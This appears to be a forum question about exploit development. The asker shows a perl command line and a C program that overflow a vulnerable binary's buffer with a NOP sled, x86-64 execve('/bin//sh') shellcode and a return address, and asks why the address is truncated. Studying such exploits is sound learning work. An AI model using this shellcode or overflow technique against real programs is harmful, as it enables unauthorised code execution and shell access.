I have an vulnerable program exploitable through the cmdline:
./vuln $(perl -e 'print "\x90"x22'; cat shell; perl -e 'print "\x90"x22';perl -e 'print "\xf4\xdd\xff\xff\xff\x7f"')
����������������������H1��;H1�QH�/bin//shWH��@0����������������������������
$
Now I want to use a C program to be able to brute force the return address, but
I’m having an issue while trying to fill the injected buffer (going through a strcpy that is vulnerable so as to overwrite rip).
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
int offset;
char shell[28] = {"\x48\x31\xc0\xb0\x3b\x48\x31\xc9\x51\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\x40\x30\xf6\x0f\x05"};
int main(int argc, char *argv[])
{
int i;
char buffer[78];
offset = atoi(argv[1]);
unsigned long get_sp()
{
__asm__("mov %rsp, %rax");
}
unsigned long ret, rsp;
rsp = get_sp();
ret = rsp + offset;
printf("%lx\n", ret);
for(i=0;i<78;i+=6)
*(buffer+i) = ret; //HERE THE PROBLEM
memset(buffer, '\x90', 22);
strncpy(&buffer[22], shell, strlen(shell));
execl("./vuln","vuln", buffer, NULL);
}
Here is the output, as you may notice the addresse is cut. Can you tell me why?
./exploit 52
7fffffffddf4
����������������������H1��;H1�QH�/bin//shWH��@0�
Continue reading Setting a return address in a simple C exploit→